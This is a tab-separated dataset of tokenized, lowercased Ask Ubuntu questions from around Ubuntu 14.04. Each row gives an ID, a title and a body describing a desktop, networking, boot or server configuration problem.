490091	ubuntu terminal colors not showing even with dircolor	ls_colors='rs=0 : di=01 ; 34 : ln=01 ; 36 : mh=00 : pi=40 ; 33 : so=01 ; 35 : do=01 ; 35 : bd=40 ; 33 ; 01 : cd=40 ; 33 ; 01 : or=40 ; 31 ; 01 : su=37 ; 41 : sg=30 ; 43 : ca=30 ; 41 : tw=30 ; 42 : ow=34 ; 42 : st=37 ; 44 : ex=01 ; 32 : *.tar=01 ; 31 : *.tgz=01 ; 31 : *.arj=01 ; 31 : *.taz=01 ; 31 : *.lzh=01 ; 31 : *.lzma=01 ; 31 : *.tlz=01 ; 31 : *.txz=01 ; 31 : *.zip=01 ; 31 : *.z=01 ; 31 : *.z=01 ; 31 : *.dz=01 ; 31 : *.gz=01 ; 31 : *.lz=01 ; 31 : *.xz=01 ; 31 : *.bz2=01 ; 31 : *.bz=01 ; 31 : *.tbz=01 ; 31 : *.tbz2=01 ; 31 : *.tz=01 ; 31 : *.deb=01 ; 31 : *.rpm=01 ; 31 : *.jar=01 ; 31 : *.war=01 ; 31 : *.ear=01 ; 31 : *.sar=01 ; 31 : *.rar=01 ; 31 : *.ace=01 ; 31 : *.zoo=01 ; 31 : *.cpio=01 ; 31 : *.7z=01 ; 31 : *.rz=01 ; 31 : *.jpg=01 ; 35 : *.jpeg=01 ; 35 : *.gif=01 ; 35 : *.bmp=01 ; 35 : *.pbm=01 ; 35 : *.pgm=01 ; 35 : *.ppm=01 ; 35 : *.tga=01 ; 35 : *.xbm=01 ; 35 : *.xpm=01 ; 35 : *.tif=01 ; 35 : *.tiff=01 ; 35 : *.png=01 ; 35 : *.svg=01 ; 35 : *.svgz=01 ; 35 : *.mng=01 ; 35 : *.pcx=01 ; 35 : *.mov=01 ; 35 : *.mpg=01 ; 35 : *.mpeg=01 ; 35 : *.m2v=01 ; 35 : *.mkv=01 ; 35 : *.webm=01 ; 35 : *.ogm=01 ; 35 : *.mp4=01 ; 35 : *.m4v=01 ; 35 : *.mp4v=01 ; 35 : *.vob=01 ; 35 : *.qt=01 ; 35 : *.nuv=01 ; 35 : *.wmv=01 ; 35 : *.asf=01 ; 35 : *.rm=01 ; 35 : *.rmvb=01 ; 35 : *.flc=01 ; 35 : *.avi=01 ; 35 : *.fli=01 ; 35 : *.flv=01 ; 35 : *.gl=01 ; 35 : *.dl=01 ; 35 : *.xcf=01 ; 35 : *.xwd=01 ; 35 : *.yuv=01 ; 35 : *.cgm=01 ; 35 : *.emf=01 ; 35 : *.axv=01 ; 35 : *.anx=01 ; 35 : *.ogv=01 ; 35 : *.ogx=01 ; 35 : *.aac=00 ; 36 : *.au=00 ; 36 : *.flac=00 ; 36 : *.mid=00 ; 36 : *.midi=00 ; 36 : *.mka=00 ; 36 : *.mp3=00 ; 36 : *.mpc=00 ; 36 : *.ogg=00 ; 36 : *.ra=00 ; 36 : *.wav=00 ; 36 : *.axa=00 ; 36 : *.oga=00 ; 36 : *.spx=00 ; 36 : *.xspf=00 ; 36 : ' ; export ls_colors one @ node : ~ $ one @ node : ~ $ dircolors -b /etc/dir_colors ls_colors='rs=0 : di=01 ; 34 : ln=01 ; 36 : mh=00 : pi=40 ; 33 : so=01 ; 35 : do=01 ; 35 : bd=40 ; 33 ; 01 : cd=40 ; 33 ; 01 : or=01 ; 05 ; 37 ; 41 : mi=01 ; 05 ; 37 ; 41 : su=37 ; 41 : sg=30 ; 43 : ca=30 ; 41 : tw=30 ; 42 : ow=34 ; 42 : st=37 ; 44 : ex=01 ; 32 : *.tar=01 ; 31 : *.tgz=01 ; 31 : *.arj=01 ; 31 : *.taz=01 ; 31 : *.lzh=01 ; 31 : *.lzma=01 ; 31 : *.tlz=01 ; 31 : *.txz=01 ; 31 : *.zip=01 ; 31 : *.z=01 ; 31 : *.z=01 ; 31 : *.dz=01 ; 31 : *.gz=01 ; 31 : *.lz=01 ; 31 : *.xz=01 ; 31 : *.bz2=01 ; 31 : *.bz=01 ; 31 : *.tbz=01 ; 31 : *.tbz2=01 ; 31 : *.tz=01 ; 31 : *.deb=01 ; 31 : *.rpm=01 ; 31 : *.jar=01 ; 31 : *.war=01 ; 31 : *.ear=01 ; 31 : *.sar=01 ; 31 : *.rar=01 ; 31 : *.ace=01 ; 31 : *.zoo=01 ; 31 : *.cpio=01 ; 31 : *.7z=01 ; 31 : *.rz=01 ; 31 : *.jpg=01 ; 35 : *.jpeg=01 ; 35 : *.gif=01 ; 35 : *.bmp=01 ; 35 : *.pbm=01 ; 35 : *.pgm=01 ; 35 : *.ppm=01 ; 35 : *.tga=01 ; 35 : *.xbm=01 ; 35 : *.xpm=01 ; 35 : *.tif=01 ; 35 : *.tiff=01 ; 35 : *.png=01 ; 35 : *.svg=01 ; 35 : *.svgz=01 ; 35 : *.mng=01 ; 35 : *.pcx=01 ; 35 : *.mov=01 ; 35 : *.mpg=01 ; 35 : *.mpeg=01 ; 35 : *.m2v=01 ; 35 : *.mkv=01 ; 35 : *.webm=01 ; 35 : *.ogm=01 ; 35 : *.mp4=01 ; 35 : *.m4v=01 ; 35 : *.mp4v=01 ; 35 : *.vob=01 ; 35 : *.qt=01 ; 35 : *.nuv=01 ; 35 : *.wmv=01 ; 35 : *.asf=01 ; 35 : *.rm=01 ; 35 : *.rmvb=01 ; 35 : *.flc=01 ; 35 : *.avi=01 ; 35 : *.fli=01 ; 35 : *.flv=01 ; 35 : *.gl=01 ; 35 : *.dl=01 ; 35 : *.xcf=01 ; 35 : *.xwd=01 ; 35 : *.yuv=01 ; 35 : *.cgm=01 ; 35 : *.emf=01 ; 35 : *.axv=01 ; 35 : *.anx=01 ; 35 : *.ogv=01 ; 35 : *.ogx=01 ; 35 : *.pdf=00 ; 32 : *.ps=00 ; 32 : *.txt=00 ; 32 : *.patch=00 ; 32 : *.diff=00 ; 32 : *.log=00 ; 32 : *.tex=00 ; 32 : *.doc=00 ; 32 : *.aac=00 ; 36 : *.au=00 ; 36 : *.flac=00 ; 36 : *.mid=00 ; 36 : *.midi=00 ; 36 : *.mka=00 ; 36 : *.mp3=00 ; 36 : *.mpc=00 ; 36 : *.ogg=00 ; 36 : *.ra=00 ; 36 : *.wav=00 ; 36 : *.axa=00 ; 36 : *.oga=00 ; 36 : *.spx=00 ; 36 : *.xspf=00 ; 36 : ' ; export ls_colors one @ node : ~ $ still no color in terminal . any suggestions , please ?
490095	i accidentally did ssh-add -d .. how do i re-add my key from authorized_keys ?	i accidentally did ssh-add -d , trying to remove a certain key but it removed all of them from my ssh-agent . do i need to re-add my key from authorized_keys or will it automatically happen next time i login with ssh -i me @ wherever ? i 'm afraid to logout and then be locked out of the system . i tried typing ssh-add /home/me/.ssh/authorized_keys but then it asks for a passphrase and i do n't know what passphrase it 's talking about .
490097	after exporting $ path , commands do n't work anymore	trying installing java , i tried to add it to the executable path with the line : export path=/usr/lib/jvm/jdk1.7.0_60/bin : $ path in the system-wide /etc/bash.bashrc file . for some reason this was n't working so i used : java_home=/usr/lib/jvm/jdk1.7.0_60 path= $ path : $ home/bin : $ java_home/bin export java_home export jre_home export path initially this seemed to work fine except that now sudo , ls , find and everything else are n't working anymore . i then tried to erase those lines and restart the system but the command were n't available ; the errors are : command 'sudo ' is available in '/usr/bin/sudo' the command could not be located because '/usr/bin ' is not included in the path environment variable . sudo : command not found to fix this i copied the content of /etc/environment in /etc/bash.bashrc , added the line export path= $ path : /usr/lib/jvm/jdk1.7.0_60/bin and then typed source /etc/bash.bashrc . again , everything was working , but only on a single terminal window and not after a restart . i tried other things and currently at the end of bash.bashrc there are the lines : export path= $ path : /usr/lib/jvm/jdk1.7.0_60/bin/ export java_home= $ java_home : /usr/lib/jvm/jdk1.7.0_60/bin/java/ but i have to type `` source /etc/environment '' and `` source /etc/bash.bashrc '' in all terminal windows to get both java and the commands . it 's like my changes are n't permanent . currently the result of `` echo $ path '' in a clear terminal window is : /usr/lib/jvm/jdk1.7.0_60/bin/ after `` source /etc/environment '' it becomes : /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games and eventually , after `` source /etc/bash.bashrc '' it is : /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games : /usr/lib/jvm/jdk1.7.0_60/bin/ anyone can help me ? i 'm under ubuntu 12.04 lts
490098	ubuntu direct x issue	im trying to play a game called conquer online . when i go to load the game i get an error that reads `` conquer online can not be started . the problem could be from your version of direct3d . it is suggested you re install your graphics driver '' . so how do i install my graphics driver again ?
490100	ubuntu 14.04 installation fail ( dual boot with windows 7 )	i was installing ubuntu 14.04 when it said it failed and it would generate a log . after some seconds it opens a windows saying it is my disk problem and i should take care of the health of it . when i tried for the second time it reconizes the previous ubuntu installation ( strange , because before the second time i logged into windows ) . other strange think is the installation does n't recognize windows in both tries ( it only appears to install ubuntu , erase the previous instalation and advanced option ) . my disk have the following partitions : 1 ntfs ( windows 7 ) 1 ntfs ( for general data ) 1 swap 1 ext 4 i tried speedfan to run some s.m.a.r.t test , here are the results : http : //www.hddstatus.com/hdrepshowreport.php ? reportcode=8166795 & reportverification=bbe6cb99 thanks for reading and a i appreaciate any help .
490103	evolution bubbles not disappearing	i have noticed this for some time that evolution calendar bubbles do sometimes not disappear like they should after hovering over the calendar item . below is a screenshot with evolution open , and another with the same persistent bubble whilst i am typing this and the browser in the background . it just wo n't disappear even when i move between workspaces , only when i close evolution . i am running ubuntu 14.04 lts and evolution 3.10.4 .
490104	how to get rid of the “scanning for btrfs file systems” at start-up ?	at start-up , i see the message scanning for btrfs file systems . how can i get rid of it ? i have tried to remove the package with sudo apt-get purge btrfs-tools , but it just shows a blank screen before the splash screen while ubuntu is booting .
490108	card reader draining power on macbook running 14.04	i 'm using 14.04 on a macbook air 5,2 ( mid 2012 , 13 '' ) . i just recently noticed powertop listing the built-in card reader to drain massive amounts of power : power est . usage device name 6.68 w 100,0 % usb device : card reader ( apple ) 399 mw 2,9 % cpu core 235 mw 3,9 ops/s gpu core 90.2 mw 3,9 ops/s gpu misc 0 mw 100,0 % usb device : usb-device-8087-0024 0 mw 100,0 % usb device : ehci host controller i 've set all usb devices to powersave via rc.local : # wlan iw dev wlan0 set power_save on ; # pci general powersaving for pci in /sys/bus/pci/devices/*/power/control ; do echo auto > $ pci ; done # usb general powersaving for usb in /sys/bus/usb/devices/*/power/control ; do echo auto > $ usb ; done # nmi watchdog echo '0 ' > '/proc/sys/kernel/nmi_watchdog ' ; # backlight echo '3 ' > '/sys/class/backlight/acpi_video0/brightness ' ; exit 0 when checking via terminal , it seems the power saving is enabled correctly : $ cat /sys/bus/usb/devices/2-1.8.3/idvendor 05ac $ cat /sys/bus/usb/devices/2-1.8.3/idproduct 8404 $ lsusb | grep 8404 bus 002 device 006 : id 05ac:8404 apple , inc. internal memory card reader $ cat /sys/bus/usb/devices/2-1.8.3/power/control auto $ cat /sys/bus/usb/devices/2-1.8.3/power/autosuspend 2 have n't noticed this right after installing 14.04 . might have been some kernel update . the card reader is still working correctly in file managers but constantly drains power now . any ideas ?
490111	problem with installing libtiff5-dev	i am new to the whole linux os , and i have been having trouble installing some packages , including libtiff5-dev , libtiff5 , libjbig-dev and libmagickcore-dev . i keep getting the following message : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : libtiff5-dev : depends : libtiff5 ( = 4.0.3-7 ) but 4.0.3-7ubuntu0.1 is to be installed depends : libjbig-dev but it is not going to be installed e : unable to correct problems , you have held broken packages . however i do not know what to do . i 'm running ubuntu 14.04 .
490112	xubuntu 14.04 does not detect second monitor	i have a dell latitude laptop e6440 . the laptop have two interfaces , vga and hdmi . i connect an external monitor to the vga port , but when i ran the xfce4-display-settings i see only one monitor ( the laptop one ofcourse ) . how can i make it to recognize the second monitor ? i already tried booting when it is connected . still no help . here is some info : i am using xubuntu 14.04 : linux 3.13.0-30-generic # 54-ubuntu smp mon jun 9 22:45:01 utc 2014 x86_64 x86_64 x86_64 gnu/linux i have a dual graphic adapter : one is : 00:02.0 vga compatible controller : intel corporation 4th gen core processor integrated graphics controller ( rev 06 ) second one is : 01:00.0 display controller : advanced micro devices , inc. [ amd/ati ] sun xt [ radeon hd 8670a/8670m/8690m ] xrandr says : xxx @ dellorian : ~ $ xrandr xrandr : failed to get size of gamma for output default screen 0 : minimum 1600 x 900 , current 1600 x 900 , maximum 1600 x 900 default connected 1600x900+0+0 0mm x 0mm 1600x900 77.0* any idea ? here is my /var/log/xorg.0.log post : http : //paste.ubuntu.com/7730096/
490114	dualboot with plop	so , i have ubuntu gnome 14.04 dual booted with windows 8 . i do n't like ubuntu 's boot loader , so i want to use plop instead . just installing plop boot made it so i could n't boot ubuntu , and i had to use boot repair . how do i do this right ? i think i need to install grub to the ubuntu partition , but how ?
490122	ca n't save images ( firefox	i 'm new with ubuntu , and frankly not that technical ( a little , perhaps.. but be gentle ) . i 've been running ubuntu ( trusty tahr ) for the past couple of weeks , but i 've never been able to save images in firefox ( the browser i prefer ) . i once or twice managed to save images by viewing them first ( never directly from the site its on ) , but now that is n't possible either . nothing really changed in the meantime , i was able to save one image , and the next i could n't . i right click , choose `` save image as '' , and nothing happens . if i drag them to my desktop , it just makes links to the site its on..
490123	i can'yt boot windows xp after installing ubuntu 12.04	i ca n't boot windows xp after installing ubuntu 12.04 and what is worst is that i do n't have the windows xp installation cd . kathy @ kathy-hp-compaq : ~ $ sudo fdisk -l [ sudo ] password for kathy : disk /dev/sda : 80.0 gb , 80026361856 bytes 255 heads , 63 sectors/track , 9729 cylinders , total 156301488 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xc51bc51b device boot start end blocks id system /dev/sda1 * 63 41957999 20978968+ 7 hpfs/ntfs/exfat /dev/sda2 41958061 156301311 57171625+ f w95 ext 'd ( lba ) /dev/sda5 41958063 101887679 29964808+ 7 hpfs/ntfs/exfat /dev/sda6 154224640 156301311 1038336 82 linux swap / solaris /dev/sda7 101888000 154222591 26167296 83 linux partition table entries are not in disk order disk /dev/mapper/cryptswap1 : 1063 mb , 1063256064 bytes 255 heads , 63 sectors/track , 129 cylinders , total 2076672 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x693811c2 disk /dev/mapper/cryptswap1 does n't contain a valid partition table please teach me how to do this things cuz i got limited knowledge in computer teach me like u teach your little sister .
490125	how to install multiple linux os on a single cd/dvd ?	i do n't have any empty dvds , but i have one with enough free space . it currently has zorin os 8 installed on it , which is 1.6 gb iso file . i would like to install ubuntu 14.04 on it as well , so i can install it on zorin os 8 . is that possible ?
490127	ubuntu 14.04 : with bridge on wlan , no internet on kvm guests	i 'm trying to be a `` high-lander '' sticking to kvm plus virt-manager to manage my vms . but it 's about a week i 'm around trying to create a bridge that works for using with my vms . i tried first tried attaching the bridge with brctl to my wlan0 , to discover that it does not work . then i discovered the trick of sudo iw dev wlan0 set 4addr on , but then i got without network connection on the host . let 's agree : not cool . today i found the solution below which i found quite reasonable in terms of implementation : small and concise . take a look at the post of nattereri , of october 1st , 2011 on the link below : http : //ubuntuforums.org/showthread.php ? t=1766674 so i installed parprouted and bcrelay and then edited my /etc/network/interfaces : # interfaces ( 5 ) file used by ifup ( 8 ) and ifdown ( 8 ) auto lo iface lo inet loopback auto br0 iface br0 inet static pre-up brctl addbr br0 setfd 0 stp off address 192.168.1.10 netmask 255.255.255.0 post-up parprouted wlan0 br0 post-up bcrelay -d -i wlan0 -o br0 post-up sysctl net.ipv4.conf.wlan0.proxy_arp=1 post-up sysctl net.ipv4.conf.br0.proxy_arp=1 i rebooted with no problems , i do have internet on the host , but when i turn on my kvm windows guest , i have no network on it . output from ifconfig -a : br0 link encap : ethernet endereço de hw fe:54:00 : ac:18 : eb inet end . : 192.168.1.10 bcast:192.168.1.255 masc:255.255.255.0 endereço inet6 : fe80 : :7016:5fff : fea5 : c505/64 escopo : link up broadcast running multicast mtu:1500 métrica:1 pacotes rx:369 erros:0 descartados:0 excesso:0 quadro:0 pacotes tx:594 erros:0 descartados:0 excesso:0 portadora:0 colisões:0 txqueuelen:0 rx bytes:29151 ( 29.1 kb ) tx bytes:59690 ( 59.6 kb ) lo link encap : loopback local inet end . : 127.0.0.1 masc:255.0.0.0 endereço inet6 : : :1/128 escopo : máquina up loopback running mtu:65536 métrica:1 pacotes rx:6675 erros:0 descartados:0 excesso:0 quadro:0 pacotes tx:6675 erros:0 descartados:0 excesso:0 portadora:0 colisões:0 txqueuelen:0 rx bytes:11318392 ( 11.3 mb ) tx bytes:11318392 ( 11.3 mb ) virbr0 link encap : ethernet endereço de hw 00:00:00:00:00:00 inet end . : 192.168.122.1 bcast:192.168.122.255 masc:255.255.255.0 up broadcast multicast mtu:1500 métrica:1 pacotes rx:91 erros:0 descartados:0 excesso:0 quadro:0 pacotes tx:7 erros:0 descartados:0 excesso:0 portadora : 0 colisões:0 txqueuelen:0 rx bytes:8628 ( 8.6 kb ) tx bytes:2342 ( 2.3 kb ) vnet0 link encap : ethernet endereço de hw fe:54:00 : ac:18 : eb endereço inet6 : fe80 : :fc54 : ff : feac:18eb/64 escopo : link up broadcast running multicast mtu:1500 métrica:1 pacotes rx:369 erros:0 descartados:0 excesso:0 quadro:0 pacotes tx:83 erros:0 descartados:0 excesso:0 portadora:0 colisões:0 txqueuelen:500 rx bytes:34353 ( 34.3 kb ) tx bytes:7229 ( 7.2 kb ) wlan0 link encap : ethernet endereço de hw 5c:51:4f : e9:96 : ed inet end . : 192.168.0.13 bcast:192.168.0.255 masc:255.255.255.0 endereço inet6 : fe80 : :5e51:4fff : fee9:96ed/64 escopo : link up broadcast running multicast mtu:1500 métrica:1 pacotes rx:81109 erros:0 descartados:0 excesso:0 quadro:0 pacotes tx:57729 erros:0 descartados:0 excesso:0 portadora:0 colisões:0 txqueuelen:1000 rx bytes:95362964 ( 95.3 mb ) tx bytes:9751111 ( 9.7 mb ) here the output of brctl show : bridge name bridge id stp enabled interfaces br0 8000.fe5400ac18eb no vnet0 virbr0 8000.000000000000 yes i turned on my kvm windows 7 guest expecting to have dhcp-assigned ips assigned to it on the 192.168.1.x range , but i it was assigned ... the ip 192.168.0.15 , with mask 255.255.255.0 and gateway 192.168.0.254 and dns servers 212.27.40.241 , 212.27.40.240 well , my vm does not see any beam of internet flow . any ideas on where i could have missed something ? is it something missing on the client ? i tried to force a static ip on the range 192.168.1.x without success ... thank you anybody for an external view . i 'm almost considering going back to vmware , but it would be a pity as i feel so close to the pleasure of the discovery . regards , luis
490130	dualboot windows 8.1 and ubuntu 14.04 on ssd + hdd	i have a notebook with 32gb ssd with windows 8.1 installed and am thinking of installing ubuntu 14.04 on dualboot , i have done a search online , but i 'm still in doubt about which is the best way to install and configure the system so that both work without problems . i saw that some people had problems and as my knowledge is more user level i would like some advice and tips to prevent it . incidentally , it is possible to maintain the ssd just for windows and create a partition on the hd to ubuntu ? i thank the attention . ps : my notebook is in this link below : http : //www.lojahp.com.br/voce/ultrabook/ultrabook-hp-pavilion-14-b080br-com-intel-core-i5-3317u-windows-8-32gb-ssd-4gb-500gb-leitor-de-cartoes-hdmi-wireless-bluetooth-led-14-1834802.html ? recsource=busca-int & rectype=busca-838
490134	adding alternative media source folders to rygel	i recently setup rygel on my laptop to play my media collection from a raspberry pi running xbmc . it works well so far , however , i can not seem to find a way to add any other folder to the index apart from the default home folders for music , pictures and videos . the problem is , most of my media are is a separate partition on my laptop , and i can not move them over to the home partition because there is n't enough space , so , i 'm wondering if there is a way to add other media sources folders to rygel . thanks .
490135	dragging desktop icons in xubuntu	just installed xubuntu 14.04 in place of vista on an old laptop . i 'm loving the user interface ( i ca n't quite get used to unity , and kde is a bit too `` clunky '' . i have put some program icons on my desktop like i used to do in windows , but i 'm having a weird problem arranging them . basically , i like to arrange my icons alphabetically in rows , like this : this in itself is easy enough to do . the problem occurs if i want to add another icon to the desktop . say for example i add an icon for gimp . i add it but i want to put it between `` document viewer '' and `` gscan2pdf '' . in windows i 'd do this by selecting everything from `` gscan2pdf '' to `` ubuntu software centre '' and drag all to the right . this would create a gap and i could drag the new icon into place . i 'd do the same with the row below and move `` ubuntu software centre '' down beside vlc . when i try the above in xubuntu however , it does n't work . the icons move , but if i drag them , they look like this : this is what happened when i tried dragging system monitor , teamviewer and ubuntu software centre to the right . instead of moving over and staying in a single row the way the icons did in windows , they arranged themselves in a column . is it possible to do what i am trying to do ? at the moment my workaround is to individually and manually rearrange every icon to make room for any new ones . it 's not a huge inconvenience , but it would be nice to solve .
490139	list installed applications grouped by type	i want a list of the applications installed in my system , however , i only want the ones listed as per the start menu . i am not interested in a list of packages / dependencies etc so the following is not that helpful : dpkg -- get-selections | grep -v deinstall this is a bit closer . for app in /usr/share/applications/*.desktop ; do echo `` $ { app:24 : -8 } '' ; done however , the names do n't match exactly what is in the menu and it does n't meet my other criterion of grouping them . e.g . i want to see graphics gimp image editor not gimp so to summarise , what i am looking for is a way to save to a text file what alacarte displays .
490140	upload libreoffice impress presentation to youtube ?	i am interested in creating a presentation in libreoffice impress , exporting in x format , and uploading it to youtube with little hassle . how do i do this ? what should x be ? and have you done this successfully before ?
490141	deploying charms using juju fails with tcp connection timed out	environment : juju bootstrapped environment with maas [ juju 1.19.x ] connected to internet : wget https : //store.juju.ubuntu.com/charm-info ? charms=cs % 3atrusty % 2fjuju-gui-3 works with the charm meta as output . trying to deploy my first juju charm using command : juju deploy juju-gui -e maas -- debug -v the following is the error : 2014-06-30 21:39:04 info juju.cmd supercommand.go:37 running juju [ 1.19.4-trusty-amd64 gc ] 2014-06-30 21:39:04 debug juju.conn api.go:187 trying cached api connection settings 2014-06-30 21:39:04 info juju.conn api.go:270 connecting to api addresses : [ dc1dt8.maas:17070 ] 2014-06-30 21:39:04 info juju.state.api apiclient.go:242 dialing `` wss : //dc1dt8.maas:17070/ '' 2014-06-30 21:39:04 info juju.state.api apiclient.go:176 connection established to `` wss : //dc1dt8.maas:17070/ '' 2014-06-30 21:41:12 error juju.cmd supercommand.go:323 can not download charm `` cs : trusty/juju-gui-3 '' : can not access the charm store . are you connected to the internet ? error details : get https : //store.juju.ubuntu.com/charm-info ? charms=cs % 3atrusty % 2fjuju-gui-3 : dial tcp 91.189.95.67:443 : connection timed out any ideas ?
490145	typing characters found in portuguese	in my text entry settings , i have portuguese ( brazil ) . however , i looked at the layout chart and it appears there is no รฃ character ( a with tilde ) which is a very common character in portuguese . also absent is the รง character ( c with cedilla ) . how do i type these characters ?
490147	lubuntu 14.04 : php5 not working with apache2	lately i have been messing around with lubuntu and today i decided to try to setup a web server ( apache2 ) with phpmyadmin and mysql server . this was going great until i attempted to use my test page . all i ended up getting was raw code . even more frightening , phpmyadmin was also spitting out just the raw code . here are the things i have already done : i have checked for short tags ( i 'm not using them ) and enabled them just in case i have made sure the php5 module is linked in apache ( it is ) i have added this code to my virtual server conf file to attempt to enable php i have reinstalled php to no avail at this point any help would be greatly appreciated . thanks guys
490148	how to modify the starting boundary of an ext4 partition ?	there are 4 partitions on the disk . parted /dev/sda -- script -- print ... 1 1049kb 50.0gb ... ext4 2 50gb 82gb ... linux-swap 3 82gb 100gb ... ext4 4 100gb 1000gb ... ext4 my goal is to modify the starting position of 4 , then expand 3 , at the same time without losing data . i know using gparted it would be quite easy but it is within an automatic script and can not launch ui . after some search , it seems to use `` cfdisk '' to delete and create new partition , then do `` resize2fs '' . but the trick is , if i modify the starting position of a partition , the `` ext4 '' property is gone and `` resize2fs '' complain unknown super-block . thank you for the help .
490150	recommended ways to add mouse control of minimise windows ubuntu 14.04	i 've recently switched from windows xp to ubuntu 14.04 and i 'm happy using ubuntu , with one small exception . i 've been unable to work out how to minimise windows using the mouse and the launch pad , and after coming from win xp i really miss the task-bar icon to show or hide the desk top . looking on the internet i 've found compizconfig , but i 've also found dire warnings that it can seriously damage your system . so what is the best way to add the option of minimising a window and show desktop using the mouse ?
490152	i got apache working on localhost ( `` it works ! `` ) , but now how do i get it to work on the internet ?	i can see my `` website '' locally but how do i get it to show up online ? does it need a domain name per se or ca n't i just get dns somehow to pick up my ip address and put it online or something , i do n't know . i 've got a domain name registered , if that helps .
490153	unity web player shows as uninstalled using pipelight on ubuntu 14.04	i am attempting to get unity web player to work using pipelight on chromium . i 've enabled the plugin , used various user agents , including safari 5/os x , but i continue to get 'you need to install unity web player ' on various platforms . i 've upgraded all my packages and tried different browsers , including firefox . what should i do next ?
490158	how do i correctly enable php 5.5 's opcache in ubuntu 14.04 ?	i 'm setting up a local server to test configurations ; it 's a clean 14.04 lamp server , as selected during os install . if i understand correctly , opcache comes with php 5.5 ( php -v confirms this ) but in a disabled state . i 've followed the internet 's suggestions to enable it , however i 'm receiving mixed messages about whether or not this has been successful . my php.ini has zend_extension=/usr/lib/php5/20121212/opcache.so opcache.enable=1 opcache.enable_cli=1 yet php -i , after restarting the machine , is telling me opcode caching = > disabled optimization = > disabled startup failed = > opcode caching is disabled for cli opcache.enable = > on = > on opcache.enable_cli = > off = > off i.e . it 's apparently enabled , and simultaneously disabled . is enabling opcache possible with the 14.04 repository php package , or do i need to compile php from source ?
490159	how do i set netbeans as the default for .java files ?	i want .java files to open with netbeans , but ubuntu does n't offer the option , neither in the drop down menu nor properties > open with . i also should mention that i 'm using ubuntu 14.04 . edit : nevermind . i was eventually unable to do it , or to get netbeans to compile , or th use this version or that , so i gave up . i finaly managed to get gedit configured correctly , so this problem is not moot . thank you for your help .
490161	input not supported - help !	good guys , first i would like to mention that i 'm from brazil , and i ca n't write in english , i apologize for spelling mistakes , i 'm using bing translator ... well here 's what happened , then urge the amd driver ( 14.6 beta linux ) for my graphics card ( hd 5770 ) , no image appears after the grub ! the system starts normally more the image does not appear , the following appears on the screen : input not supported . i would be grateful if someone could help me , thanks . i use ubuntu 14.04 .
490162	node.js server silently fails with upstart	i can manually run my node.js server with ./server.js , but when i try to daemonize it with upstart , it silently fails . any idea why this would happen ? i tried enabling console logging in the upstart configuration , and temporarily removed 2 > & 1 , but i could never get it to produce any log files , either in stdout , stderr , or in /var/log/upstart/ , /var/log/message , etc etc . source : https : //github.com/mcandre/node-ios7crypt/
490164	juju icehouse-openstack lxc	trying to instantiate an lxc image on a compute node , by changing virt-type ( string ) field , under nova-compute charm to lxc . this , however , does not update the virt_type , in nova-compute.conf file . furthermore , by manually updating compute_driver=nova.virt.lxc.lxcdriver , i get the following error log : http : //paste.ubuntu.com/7728899/ . setting virt_type=lxc and compute_driver=libvirt.libvirtdrive , gives this error log : http : //paste.ubuntu.com/7729006/ as noted , i 've installed lxc and nova-compute-lxc . any thoughts ? commenting out line 5907 in /usr/lib/python2.7/dist-packages/libvirt.py , while virt_type=lxc , gets rid of virconnectbaselinecpu error . upon restarting nova-compute , the following log is obtained : http : //paste.ubuntu.com/7738267/ , which seems to imply that you are on your own ! at any rate , launching an image from dashboard fails during mounting of container 's file system , with the following log : http : //paste.ubuntu.com/7738278/
490167	how to fix ubuntu 14.04 's file operations progress dialog for copying from an ssd to a flash disk ?	at the moment the dialog quickly progress till the end and stays there for a few minutes and after that shows 0 seconds left for a minute or two after that before the copy operation is actually finished : this is pretty much annoying . is there a way to fix this ? ?
490171	how accurate is epoch time in nanoseconds ?	i wish to learn how accurate is the time that is been shown when typing date + % s % n in the terminal . i know this gives us the epoch time in nanoseconds but are the numbers real ? . does it represent the moment i hit enter in nanoseconds or is it fake at some accuracy and below ; say milliseconds ?
490174	how to put the minimize all open windows and show the the desktop icon in the panel in xubuntu ?	how does one put the minimize all open windows and show the the desktop icon in the panel in xubuntu 14.04 lts ? thanks for your time .
490175	how to mount a 20 tb file system	i have recently created a file server with 6x4tb hard drives . one hard drive is used as the file system and is formatted with ext4 . while i have created an lvm with the other five drives . this lvm system has a 20tb capacity and is formatted with xfs ( i have tried with ext4 and got the same error as i am about to describe ) . whenever i try to mount the drive , i get an error saying mount : file too large . the command i type in is sudo mount /dev/drive /folder . i have tried adding the filesystem parameter but it makes no difference . i am under a huge time constraint so any help would be appreciated thank you .
490177	mythbuntu 14.04 lts	mythbuntu 14.04 lts ; how do i get to a terminal screen or a normal linux menu ? need to set static ip address . question was not asked during install . all i see is large character pages with media related questions , no networking . current lan is standard wired ethernet . covers some 22+ ethernet connected devices over 3 residences . all devices set up static and working correctly . why is there not a simple question , dhcp/static , during install . seems this would solve a lot of problems .
490178	suspend from the command line and show unity 's lock screen in 14.04 ?	how can i suspend my computer from the command line and , once it wakes up , display unity 's lock screen ? i want to replicate exactly what happens when i click on the system cog icon at the top right of the unity panel and go to suspend in ubuntu 14.04 ( not an earlier version ! ) . i 've found many answers that do not work , such as those found here and here . all of them are for older versions of ubuntu or invoke either gnome-screensaver or xscreensaver 's lock screen . this command , for instance , suspends the computer , but does not lock the screen : dbus-send -- system -- print-reply -- dest=org.freedesktop.upower /org/freedesktop/upower org.freedesktop.upower.suspend , despite require my password when waking from suspend being checked in the brightness & lock system settings . actually , i do n't even know how to invoke unity 's lock screen at all in 14.04 : the closest i can come to is dm-tools lock , but this is not quite the same , as it allows you to sign in as a different user and shows more indicators .
